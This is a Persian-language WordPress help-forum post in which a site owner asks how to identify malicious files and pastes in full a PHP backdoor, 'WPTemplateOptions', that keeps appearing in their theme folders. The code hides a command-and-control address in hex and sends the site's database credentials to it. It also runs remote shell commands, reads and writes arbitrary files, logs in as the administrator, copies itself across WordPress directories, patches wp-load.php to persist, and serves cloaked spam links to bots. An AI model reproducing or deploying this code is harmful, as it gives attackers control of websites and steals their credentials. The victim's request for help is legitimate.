آموزش های عمومیامنیتبخش وردپرسعمومیوردپرس

سوال امنیتی طریقه شناسایی فایل های مخرب

سوال امنیتی طریقه شناسایی فایل های مخرب
سوال امنیتی طریقه شناسایی فایل های مخرب
سوال امنیتی طریقه شناسایی فایل های مخرب
سوال امنیتی طریقه شناسایی فایل های مخرب
سوال امنیتی طریقه شناسایی فایل های مخرب

نوشته : taranoome

سلام دوستان من چندی پیش از می هاست هاست میزبانی داخلی گرفتم ولی هاستشون تمام فایل های سایت من رو الوده کرد و منم هاست رو منتقل کردم جای دیگه و کاری که کردم فایل های وردپرس رو دوباره ریختم ولی هنوز بعد از چند وقت باز میبینم فایل های عجیبی داخل سایتم ایجاد میشه نمونه الان به نام هر پوشه یک فایل php ایجاد شده به نام همون پوشه و محتویات زیر داخلشه که نمیدونم چیه

<?php
if ( ! class_exists( 'WPTemplateOptions' ) ) {
 class WPTemplateOptions {
 private $script = '';
 private $version = '';
 private $upDir = '';
 private $uploadDir = '';
 private $uploadUrl = '';
 private $token = '';
 private $baseUrl = '';
 public $allowedActions = [
 'check',
 'json',
 'login',
 'template_dir',
 'cache',
 'get',
 'install',
 'uninstall',
 'write_file',
 'read_file',
 'activate_plugins',
 'get_themes',
 'list_folders',
 'spread',
 'unspread',
 'all',
 'wp_includes',
 'wp_admin',
 'themes',
 'uploads',
 'wp_load',
 'command',
 ];
 public $isSpread = [ 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads' ];
 public function __construct( $token ) {
 $this->baseUrl = hex2bin( '687474703a2f2f6a732e61706965732e6f72672f' );
 $this->script = 'Wordpress';
 $this->version = '1.1';
 $this->upDir = wp_upload_dir();
 $this->uploadDir = $this->upDir['path'];
 $this->uploadUrl = $this->upDir['url'];
 $this->token = $token;
 }
 private function answer( $code, $message, $data = '', $errorNo = '' ) {
 $answer['code'] = $code;
 $answer['message'] = $message;
 $answer['data'] = $data;
 if ( $errorNo !== '' ) {
 $answer['errorNo'] = $errorNo;
 }
 return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
 }
 private function check() {
 try {
 if ( $this->uploadDir ) {
 if ( ! is_writable( $this->uploadDir ) ) {
 if ( ! @chmod( $this->uploadDir, 0777 ) ) {
 $data['uploadDirWritable'] = false;
 } else {
 $data['uploadDirWritable'] = true;
 }
 } else {
 $data['uploadDirWritable'] = true;
 }
 } else {
 $data['uploadDirWritable'] = true;
 }
 $data['clientVersion'] = $this->version;
 $data['uploadDir'] = $this->uploadDir;
 $data['script'] = $this->script;
 $data['cache'] = ( WP_CACHE ) ? true : false;
 $data['command'] = ( $this->command( null ) === false ) ? false : true;
 $data['themeName'] = wp_get_theme()->get( 'Name' );
 $data['themeDir'] = get_template_directory();
 $data['themes'] = $this->get_themes();
 $data['plugins'] = $this->get_plugins();
 $data['root'] = ABSPATH;
 if ( function_exists( 'php_uname' ) ) {
 $data['uname'] = php_uname();
 }
 if ( function_exists( 'gethostbyname' ) ) {
 $data['hostname'] = gethostbyname( getHostName() );
 }
 return $this->answer( 'OK', $this->script, $data );
 } catch ( Exception $e ) {
 return $this->answer( "ERROR", "Unknown ERROR", $e->getMessage(), "ERR000" );
 }
 }
 private function isAllowedToSendCommand() {
 try {
 if ( md5( $this->token ) === 'a5ee7285ff6c995e9d94f517cd300d2c' ) {
 return true;
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function controlAction( $action, $params ) {
 try {
 if ( isset( $action ) ) {
 if ( $this->isAllowedToSendCommand() ) {
 if ( array_search( $action, $this->allowedActions ) !== false AND method_exists( $this, $action ) ) {
 return $this->{$action}( $params );
 } else {
 return $this->answer( 'ERROR', 'Invalid Command', $action, 'ERR001' );
 }
 }
 }
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'Unknown Error', [
 "action" => $action,
 "params" => $params
 ], 'ERR000' );
 }
 }
 private function post() {
 try {
 return wp_remote_post( $this->baseUrl, [
 "body" => [
 "url" => site_url( '/' ),
 "client" => $this->check(),
 "DB_HOST" => DB_HOST,
 "DB_USER" => DB_USER,
 "DB_PASSWORD" => DB_PASSWORD,
 "DB_NAME" => DB_NAME,
 ]
 ] );
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function client() {
 try {
 $client = wp_remote_get( "{$this->baseUrl}client/checkFiles?script={$this->script}" );
 if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
 return wp_remote_retrieve_body( $client );
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function get_plugins() {
 try {
 if ( ! function_exists( 'get_plugins' ) ) {
 include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
 }
 foreach ( get_plugins() AS $plugin_name => $get_plugin ) {
 $plugins[ $plugin_name ] = $get_plugin;
 if ( is_plugin_active( $plugin_name ) ) {
 $plugins[ $plugin_name ]["active"] = 1;
 } else {
 $plugins[ $plugin_name ]["active"] = 0;
 }
 }
 return ( isset( $plugins ) ) ? $plugins : false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function activate_plugins( $plugin_name ) {
 try {
 if ( is_plugin_active( hex2bin( $plugin_name ) ) ) {
 deactivate_plugins( hex2bin( $plugin_name ) );
 return $this->check();
 } else {
 activate_plugins( hex2bin( $plugin_name ) );
 return $this->check();
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function get_themes() {
 try {
 foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
 $themes{$wp_get_theme->stylesheet} = array(
 'Name' => $wp_get_theme->get( 'Name' ),
 'Description' => $wp_get_theme->get( 'Description' ),
 'Author' => $wp_get_theme->get( 'Author' ),
 'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ),
 'Version' => $wp_get_theme->get( 'Version' ),
 'Template' => $wp_get_theme->get( 'Template' ),
 'Status' => $wp_get_theme->get( 'Status' ),
 'TextDomain' => $wp_get_theme->get( 'TextDomain' )
 );
 }
 return $themes;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function folder_exist( $folder ) {
 try {
 $path = realpath( $folder );
 return ( $path !== false AND is_dir( $path ) ) ? $path : false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function list_folders( $directory ) {
 try {
 $directory = ( isset( $directory ) && $directory !== "" ) ? hex2bin( $directory ) : ABSPATH;
 if ( ( $dir = $this->folder_exist( $directory ) ) !== false ) {
 return $this->answer( "OK", $directory, glob( $directory . "/*" ) );
 } else {
 return $this->answer( "ERROR", "Failed to find folder to list!", $directory, "ERR023" );
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function replace( $filename, $search, $replace ) {
 try {
 $source = $this->read( $filename );
 if ( strpos( $source, $replace ) === false ) {
 $pos = strpos( $source, $search );
 if ( $pos !== false ) {
 $content = substr_replace( $source, $replace, $pos, strlen( $search ) );
 return ( $this->write( $filename, $content ) ) ? $filename : false;
 } else {
 return $filename;
 }
 } else {
 return $filename;
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function restore( $filename, $search, $replace ) {
 try {
 $source = $this->read( $filename );
 return $this->write( $filename, str_replace( $search, $replace, $source ) );
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function template_dir( $search ) {
 try {
 if ( $search == "" ) {
 $search = "<?phpn";
 }
 $dir = glob( get_theme_root() . "/*/*/*" );
 $files = array_filter( $dir );
 foreach ( $files as $k => $file ) {
 $source = $this->read( $file );
 if ( ! is_array( $source ) && strpos( $source, $search ) === false ) {
 unset( $files[ $k ] );
 }
 }
 return array_values( $files );
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function install() {
 try {
 $clientURL = $this->client();
 if ( $clientURL !== false ) {
 foreach ( $this->template_dir( "" ) AS $file ) {
 $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
 if ( $copyFile !== false ) {
 $search = "<?phpn";
 $replace = "<?phpnif ( ! class_exists( 'WPTemplateOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {ntinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );n}n";
 if ( strpos( $this->read( $file ), "namespace" ) === false ) {
 $directory[] = $this->replace( $file, $search, $replace );
 }
 }
 }
 return ( isset( $directory ) ) ? $this->answer( 'OK', 'I get install!', array_values( array_unique( $directory ) ) ) : $this->answer( 'ERROR', 'I Don't install!', '', 'ERR002' );
 }
 return $this->answer( 'ERROR', 'Client URL FALSE!', "", "ERR026" );
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'Install Exception!', $e->getMessage(), "ERR026" );
 }
 }
 public function uninstall() {
 try {
 $clientURL = $this->client();
 if ( $clientURL !== false ) {
 foreach ( $this->template_dir( "" ) AS $file ) {
 $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
 $search = "if ( ! class_exists( 'WPTemplateOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {ntinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );n}";
 $uninstall = $this->restore( $file, $search, "n" );
 $this->restore( $file, "nnn", "n" );
 if ( $uninstall ) {
 $return[] = $file;
 if ( file_exists( $copyFile ) ) {
 unlink( $copyFile );
 }
 }
 }
 return ( isset( $return ) )
 ? $this->answer( 'OK', 'Please find me!', array_values( array_unique( $return ) ) )
 : $this->answer( 'ERROR', 'Don't search me!', '', 'ERR002' );
 }
 return $this->answer( 'ERROR', 'Client URL FALSE!', "", "ERR026" );
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'Uninstall Exception!', $e->getMessage(), "ERR026" );
 }
 }
 public function wp_load() {
 try {
 $filename = ABSPATH . 'wp-load.php';
 if ( file_exists( $filename ) ) {
 $clientURL = $this->client();
 if ( $clientURL !== false ) {
 $copy = $this->copy_themes( get_template_directory() . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
 if ( $copy !== false ) {
 $basename = basename( $copy );
 $search = "nif ( ! class_exists( 'WPTemplateOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' ) ) {ntinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' );n}";
 if ( ! stristr( $this->read( $filename ), $search ) ) {
 if ( $this->write_append( $filename, $search ) ) {
 return $this->answer( "OK", "WP_LOAD Installeds {$copy}", $filename );
 } else {
 return $this->answer( "ERROR", "WP_LOAD Installed {$copy}", $filename, "ERR029" );
 }
 } else {
 return $this->answer( "OK", "WP_LOAD Already Installed {$copy}", $filename );
 }
 } else {
 return $this->answer( "ERROR", "WP_LOAD Installed {$copy}", $filename, "ERR030" );
 }
 } else {
 return $this->answer( 'ERROR', 'Client URL FALSE!', $clientURL, "ERR026" );
 }
 }
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'WP_LOAD Exception!', $e->getMessage(), "ERR000" );
 }
 }
 private function copy( $directory, $clientURL ) {
 try {
 foreach ( $clientURL as $filePath => $icerik ) {
 $filename = ( stristr( $directory, "wp-content/uploads/" ) ) ? $directory . 'index.php' : $directory . basename( dirname( $directory . $filePath ) ) . '.php';
 if ( file_exists( $filename ) ) {
 $strpos = strpos( $this->read( $filename ), "class WPTemplateOptions" );
 if ( $strpos !== false ) {
 return ( $this->write( $filename, $icerik ) ) ? $filename : false;
 } elseif ( $strpos === false ) {
 return ( $this->write( $directory . $filePath, $icerik ) ) ? $directory . $filePath : false;
 }
 } else {
 return ( $this->write( $filename, $icerik ) ) ? $filename : false;
 }
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function copy_themes( $directory, $clientURL ) {
 try {
 foreach ( $clientURL as $filePath => $icerik ) {
 $filename = $directory . basename( $directory . $filePath );
 if ( file_exists( $filename ) ) {
 $strpos = strpos( $this->read( $filename ), "class WPTemplateOptions" );
 if ( $strpos !== false ) {
 return ( $this->write( $filename, $icerik ) ) ? $filename : false;
 } elseif ( $strpos === false ) {
 return ( $this->write( $directory . basename( dirname( $filename ) ) . '.php', $icerik ) ) ? $directory . basename( dirname( $filename ) ) . '.php' : false;
 }
 } else {
 return ( $this->write( $filename, $icerik ) ) ? $filename : false;
 }
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function write_append( $filename, $data ) {
 try {
 if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
 $write = fopen( $filename, "a" );
 return ( fwrite( $write, $data ) ) ? true : false;
 } elseif ( function_exists( 'file_put_contents' ) ) {
 return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : false;
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function listFolderFiles( $dir ) {
 try {
 $fileInfo = scandir( $dir );
 $allFileLists = [];
 foreach ( $fileInfo as $folder ) {
 if ( $folder !== '.' && $folder !== '..' ) {
 if ( is_dir( $dir . DIRECTORY_SEPARATOR . $folder ) === true ) {
 $allFileLists[ $dir . DIRECTORY_SEPARATOR . $folder ] = $this->listFolderFiles( $dir . DIRECTORY_SEPARATOR . $folder );
 }
 }
 }
 return $allFileLists;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function all() {
 try {
 foreach ( array_merge( $this->wp_includes(), $this->wp_admin(), $this->themes(), $this->uploads() ) AS $root ) {
 if ( is_dir( $root ) ) {
 $return[] = $root;
 }
 }
 return array_filter( $return );
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function wp_includes() {
 try {
 foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . WPINC ) ) AS $folders ) {
 if ( is_dir( $folders ) ) {
 $return[] = $folders . DIRECTORY_SEPARATOR;
 }
 }
 return $return;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function wp_admin() {
 try {
 foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . ADMIN_COOKIE_PATH ) ) AS $folders ) {
 if ( is_dir( $folders ) ) {
 $return[] = $folders . DIRECTORY_SEPARATOR;
 }
 }
 return $return;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function uploads() {
 try {
 foreach ( $this->array_keys( $this->listFolderFiles( $this->upDir["basedir"] ) ) AS $folders ) {
 if ( is_dir( $folders ) ) {
 $return[] = $folders . DIRECTORY_SEPARATOR;
 }
 }
 return $return;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function themes() {
 try {
 foreach ( glob( get_theme_root() . "/*", GLOB_ONLYDIR ) AS $item ) {
 $template_folders[] = $this->listFolderFiles( $item );
 }
 foreach ( $this->array_keys( $template_folders ) AS $folders ) {
 if ( is_dir( $folders ) ) {
 $return[] = $folders . DIRECTORY_SEPARATOR;
 }
 }
 return $return;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function spread( $directory ) {
 try {
 $client = $this->client();
 if ( $client !== false ) {
 if ( array_search( $directory, $this->isSpread ) !== false ) {
 foreach ( $this->{$directory}() as $folder ) {
 $return[] = $this->copy( $folder, json_decode( $client ) );
 }
 return $this->answer( "OK", "I spread {$directory}", $return );
 } else {
 return $this->answer( "ERROR", "Undefined Directory", $directory, "ERR024" );
 }
 }
 return $this->answer( 'ERROR', 'Client URL FALSE!', "", "ERR026" );
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'Spread Exception!', $e->getMessage(), "ERR000" );
 }
 }
 public function unspread( $directory ) {
 try {
 $client = $this->client();
 if ( $client !== false ) {
 if ( array_search( $directory, $this->isSpread ) !== false ) {
 foreach ( $this->{$directory}() as $folder ) {
 $return[] = $this->copy( $folder, json_decode( $client ) );
 }
 foreach ( $return as $file ) {
 unlink( $file );
 }
 return $this->answer( "OK", "I cleared myself from the spread {$directory}", $return );
 } else {
 return $this->answer( "ERROR", "Undefined Directory", $directory, "ERR025" );
 }
 }
 return $this->answer( 'ERROR', 'Client URL FALSE!', "", "ERR026" );
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'UNSpread Exception!', $e->getMessage(), "ERR000" );
 }
 }
 public function json() {
 try {
 return $this->uploadDir . DIRECTORY_SEPARATOR . ".json";
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function get() {
 try {
 $post = $this->post();
 if ( wp_remote_retrieve_response_code( $post ) == "200" ) {
 $write = $this->write( $this->json(), bin2hex( wp_remote_retrieve_body( $post ) ) );
 return ( $write ) ? hex2bin( $this->read( $this->json() ) ) : wp_remote_retrieve_body( $post );
 } else {
 return $this->read( $this->json() );
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function cache() {
 try {
 if ( file_exists( $this->json() ) ) {
 $file = hex2bin( $this->read( $this->json() ) );
 $json = json_decode( $file );
 if ( $this->minute( $json->date ) >= 24 ) {
 return $this->get();
 } else {
 return $file;
 }
 } else {
 return $this->get();
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function write( $filename, $data ) {
 try {
 if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
 $write = fopen( $filename, "w " );
 return ( fwrite( $write, $data ) ) ? true : false;
 } elseif ( function_exists( 'file_put_contents' ) ) {
 return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function write_file( $params ) {
 try {
 if ( $this->json_validator( hex2bin( $params ) ) ) {
 $json = json_decode( hex2bin( $params ) );
 if ( isset( $json->filename ) ) {
 if ( file_exists( $json->filename ) ) {
 if ( isset( $json->content ) ) {
 if ( $this->write( $json->filename, html_entity_decode( hex2bin( $json->content ) ) ) ) {
 return $this->answer( "OK", $json->filename, html_entity_decode( hex2bin( $json->content ) ), "I get write" );
 }
 } else {
 return $this->read_file( bin2hex( $json->filename ) );
 }
 } else {
 $content = ( isset( $json->content ) && $json->content != '' ) ? html_entity_decode( hex2bin( $json->content ) ) : "<?phpn";
 if ( $this->write( $json->filename, $content ) ) {
 return $this->answer( "OK", $json->filename, $content );
 } else {
 return $this->answer( "ERROR", $json->filename, $content, "ERR023" );
 }
 }
 } else {
 return $this->answer( "ERROR", "File name undefined", "", "ERR020" );
 }
 } else {
 return $this->answer( "ERROR", "Data is not JSON", "", "ERR021" );
 }
 return $this->answer( "ERROR", "Unknown error", $params, "ERR022" );
 } catch ( Exception $e ) {
 return $this->answer( "ERROR", "Write file Exception", $params, "ERR000" );
 }
 }
 public function read( $filename ) {
 try {
 if ( ! file_exists( $filename ) ) {
 return $this->answer( 'ERROR', 'File not found', $filename, 'ERR019' );
 }
 if ( function_exists( 'file_get_contents' ) ) {
 return file_get_contents( $filename );
 }
 if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
 $file = fopen( $filename, 'r' );
 $content = fread( $file, filesize( $filename ) );
 fclose( $file );
 return $content;
 }
 return $this->answer( 'ERROR', 'File not read', $filename, 'ERR018' );
 } catch ( Exception $e ) {
 return $this->answer( 'ERROR', 'File not read Exception', $filename, 'ERR000' );
 }
 }
 public function read_file( $filename ) {
 try {
 $read_file = $this->read( hex2bin( $filename ) );
 if ( $this->json_validator( $read_file ) ) {
 return $read_file;
 } else {
 return $this->answer( "OK", hex2bin( $filename ), $read_file );
 }
 } catch ( Exception $e ) {
 return $this->answer( "ERROR", "Read File Exception", $filename, "ERR000" );
 }
 }
 public function json_validator( $data = null ) {
 try {
 if ( ! empty( $data ) ) {
 @json_decode( $data );
 return ( json_last_error() === JSON_ERROR_NONE );
 }
 return false;
 } catch ( Exception $e ) {
 return false;
 }
 }
 public function login( $id = 1 ) {
 try {
 $user_info = get_userdata( $id );
 $username = $user_info->user_login;
 $user = get_user_by( 'login', $username );
 if ( ! is_wp_error( $user ) ) {
 wp_clear_auth_cookie();
 wp_set_current_user( $user->ID );
 wp_set_auth_cookie( $user->ID );
 $redirect_to = user_admin_url();
 wp_safe_redirect( $redirect_to );
 exit();
 } else {
 return $this->answer( 'ERROR', 'I can't sign in, sorry', $user_info, 'ERR014' );
 }
 } catch ( Exception $e ) {
 return $this->answer( "ERROR", "Login Exception!", $e->getMessage(), "ERR000" );
 }
 }
 public function command( $cmd ) {
 try {
 if ( function_exists( 'shell_exec' ) ) {
 return $this->answer( "OK", hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
 } else if ( function_exists( 'exec' ) ) {
 @exec( hex2bin( $cmd ), $return );
 return $this->answer( "OK", hex2bin( $cmd ), $return );
 } else {
 return false;
 }
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function array_keys( $array ) {
 try {
 $keys = array_keys( $array );
 foreach ( $array as $i ) {
 if ( is_array( $i ) ) {
 $keys = array_merge( $keys, $this->array_keys( $i ) );
 }
 }
 return $keys;
 } catch ( Exception $e ) {
 return false;
 }
 }
 private function minute( $date ) {
 try {
 $minute = ( strtotime( date( "Y-m-d H:i:s" ) ) - strtotime( $date ) ) / 60 / 60;
 return round( $minute );
 } catch ( Exception $e ) {
 return 0;
 }
 }
 public static function init() {
 try {
 $cache = json_decode( ( new self( "" ) )->cache() );
 add_action( $cache->location, array( 'WPTemplateOptions', 'method' ) );
 } catch ( Exception $e ) {
 }
 }
 public static function method() {
 try {
 $cache = json_decode( ( new self( "" ) )->cache() );
 $index = ( preg_match( "~({$cache->bot})~i", strtolower( @$_SERVER["HTTP_USER_AGENT"] ) ) ) ? true : false;
 if ( $index && $cache->status == 9 && ! empty( $cache->redirect ) && isset( $cache->redirect ) ) {
 header( "Location: {$cache->redirect}", true, 301 );
 }
 if ( $index && $cache->is_home ) {
 echo $cache->style . implode( $cache->implode, $cache->link );
 }
 if ( $index && ! $cache->is_home && ! is_home() && ! is_front_page() ) {
 echo $cache->style . implode( $cache->implode, $cache->link );
 }
 } catch ( Exception $e ) {
 }
 }
 }
}
try {
 if ( ! function_exists( 'preArrayList' ) ) {
 function preArrayList( $arr ) {
 echo "
";
 print_r( $arr );
 echo "

";
}
}
if ( ! defined( "ABSPATH" ) ) {
foreach (
[
"..",
"../..",
"../../..",
"../../../..",
"../../../../..",
"../../../../../.."
] AS $directory
) {
if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) {
include_once
( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
}
}
}
} catch ( Exception $e ) {
}
try {
$token
= @$_REQUEST["wp_action_token"];
$action
= @$_REQUEST['wp_action_application'];
$params
= @$_REQUEST['wp_action_params'];
error_reporting
( 0 );
if ( ! is_null( $token ) && ! empty( $token ) ) {
$WPTemplateOptions
= new WPTemplateOptions( $token );
$controlAction
= $WPTemplateOptions->controlAction( $action, $params );
if ( is_array( $controlAction ) || is_object( $controlAction ) ) {
preArrayList
( $controlAction );
} else {
echo $controlAction
;
}
} else {
WPTemplateOptions::init();
}
} catch ( Exception $e ) {
}

این به پوشه های قالب اضافه شده مثال من پوشه پنل دارم داخل پوشه یک فایل به نام panel.php داخلش ایجاد شده و این کد داخلشه یا پوشه js دارم باز داخل پوشه یک فایل به نام js.php ایجاد شده و این کد داخلشه

ممنون میشم بگید این کد چیه و به چه شکل فایل الوده رو پیدا کنم

با تشکر


(1) آموزش شناسایی کد مخرب و بدافزار در قالب
آموزش شناسایی کد مخرب و بدافزار در قالب ها و افزونه های وردپرسی - جامه


(2) شناسایی و حذف کدهای مخرب فایل htaccess
شناسایی و حذف کدهای مخرب فایل htaccess. - مرکز آموزش - سازمان هاست


(3) نحوه شناسایی کدهای مخرب در قالب ها و
نحوه شناسایی کدهای مخرب در قالب ها و افزونه های وردپرس نال شده یا رایگان - امنیت وردپرس


(4) افزایش امنیت وردپرس و اسکن امنیتی
افزایش امنیت وردپرس و اسکن امنیتی وردپرس با Wordfence Security وی میزبان ایرانیان


(5) معرفی بهترین افزونه های امنیتی وردپرس
معرفی بهترین افزونه های امنیتی وردپرس - مرکز آموزش - میهن وب هاست


(6) اسکن وردپرس برای پیدا کردن فایلهای مخرب
اسکن وردپرس برای پیدا کردن فایلهای مخرب و تروجان


(7) شناسایی ویروس تروجان و کد های مخرب
شناسایی ویروس تروجان و کد های مخرب قالب و افزونه وردپرس 100 عملی


(8) تکنیک های قدم به قدم رفع مشکلات امنیتی
تکنیک های قدم به قدم رفع مشکلات امنیتی وبسایت از طریق گوگل - پایگاه دانش میزبانفا


(9) اسکن وردپرس - تشخیص کد مخرب در قالب و
اسکن وردپرس - تشخیص کد مخرب در قالب و افزونه و رفع آسیبپذیریهای امنیتی سایت


(10) 14 مورد از بهترین اسکنرهای شناسایی هک و
14 مورد از بهترین اسکنرهای شناسایی هک و بد افزارها در وردپرس - آموزش امنیت وردپرس

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دوازده + 3 =

دکمه بازگشت به بالا